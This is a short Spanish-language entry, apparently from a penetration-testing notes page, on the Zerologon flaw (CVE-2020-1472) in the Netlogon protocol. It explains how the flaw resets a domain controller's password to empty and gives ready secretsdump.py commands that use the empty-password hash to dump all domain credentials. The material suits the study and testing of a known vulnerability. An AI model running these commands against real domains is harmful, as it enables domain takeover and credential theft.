
[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Escalada de Privilegios (Zerologon)
[CVE-2020-1472] Escalada de privilegios en la llamada de protocolo remoto Netlogon (MS-NRPC) (Zerologon)
El ataque descrito aquí aprovecha fallas en un protocolo de autenticación criptográfica (uso inseguro de AES-CFB8) que demuestra la autenticidad e identidad de un equipo unido al dominio ante el Controlador de Dominio (DC). Debido al uso incorrecto de un modo de operación de AES, es posible falsificar la identidad de cualquier cuenta de equipo (incluida la del propio DC) y establecer una contraseña vacía (simplemente enviando una serie de mensajes Netlogon en los que varios campos se rellenan con ceros) para esa cuenta en el dominio. Esto puede utilizarse después para obtener credenciales de administrador de dominio y, a continuación, restaurar la contraseña original del DC.
Para comprobar CVE-2020-1472
Para explotar CVE-2020-1472
A continuación, ejecute uno de los siguientes comandos
Formato de ejemplo 1: python secretsdump.py domain/example-dc$@fqdn-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc
Formato de ejemplo 2: python secretsdump.py domain/example-dc$@ip-of-dc
./secretsdump.py zerologon.local/DC01\[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc

La publicación original del blog está disponible aquí
El repositorio original que incluye el script de prueba en Python está disponible aquí
El repositorio original que incluye el script de explotación en Python está disponible aquí